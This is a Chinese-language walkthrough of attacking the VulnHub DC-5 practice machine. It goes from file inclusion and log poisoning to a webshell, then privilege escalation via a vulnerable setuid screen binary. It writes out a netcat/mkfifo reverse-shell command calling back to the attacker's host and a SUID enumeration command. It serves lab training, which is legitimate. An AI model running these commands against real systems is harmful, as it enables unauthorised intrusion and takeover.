今天继续我们的vulnhub靶机系列,我们今天的靶场是DC-5,后面是下载地址https://download.vulnhub.com/dc/DC-5.zip,官网下载的还是挺快的,有需要网盘的朋友可以评论区留言。下面我们就开始打靶。
0x00导入靶场
这一步比较简单,就不赘述,把靶场导进去就行了,要注意的是我们把网络适配器改为NAT模式,这里比较简单,也不赘述。
0x01信息收集
我们看看靶机的ip地址
因为我的kali机的ip地址是192.168.133.130,所以靶机的ip地址是192.168.133.132
我们看看靶机开放的端口
看到开放了80端口,我们访问一下看看
这都是些啥东西,看也看不懂,但发现contact界面可以提交东西,试了下xss,结果失败
偶然的发现刷新界面,下面的年份会发生改变
我猜就算没有后面的参数,刷新应该也会改变年份,我们试试看
果然发生该变 了
接着我们用dirsearch扫面看看
我们试试footer.php这个页面看看
刷新一下发现页面这个还是在变
thankyou.php页面包含了footer.php这个页面的东西,而且都会发生改变,于是联想到文件包含漏洞
试下/etc/passwd看看能不能成功
发现成功了
我们爆破看看能发现哪些文件
爆破出了日志文件
访问看看
0x02webshell注入
然后我们就尝试往日志文件写入一句话木马
然后我们用蚁剑连接·
我们打开终端 (点击第一个terminal )
先开一个监听端口
然后在蚁剑那个终端输入命令(注意ip是kali的ip,不是靶机的)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.133.130 4444 >/tmp/f
回去发现监听成功
我们输入命令变为交互方式
python -c 'import pty;pty.spawn("/bin/bash")';
0x03漏洞利用
看看能利用提权的文件或命令
find / -perm /4000 2>/dev/null
测试发现screen可以被拿来提权
我们用searchsploit看看能利用的方法
第一个就是我们能够利用的
我们看看文件的位置
看看里面的内容
我们根据里面的提示来,先创建一个libhax,c文件,把第一部分的C语言代码放进去,然后进行编译
然后保存接着编译
然后删除libhax.c文件
接着我们处理第二段C语言代码,一样的方式
然后新建一个dc5.sh文件,把刚才文件的C语言代码的部分删除重新保存
然后把刚才编译的文件上传到蚁剑里面的tmp目录下,点击upload file
然后把刚刚编译好的问价上传上去
我们再重新开启一个新的监听
在蚁剑的刚刚上传文件那里打开终端,输入命令
最下面那个Open Terminal Here
发现监听成功,然后输入命令变为交互模式
0x05提取权限
授予执行权限
然后提权
看看我们此时的权限已经是root权限了
下面就好整了,切换到root问价下,就看到了flag文件
cat一下问价就看到了flag文件的内容
成功拿下这个靶机。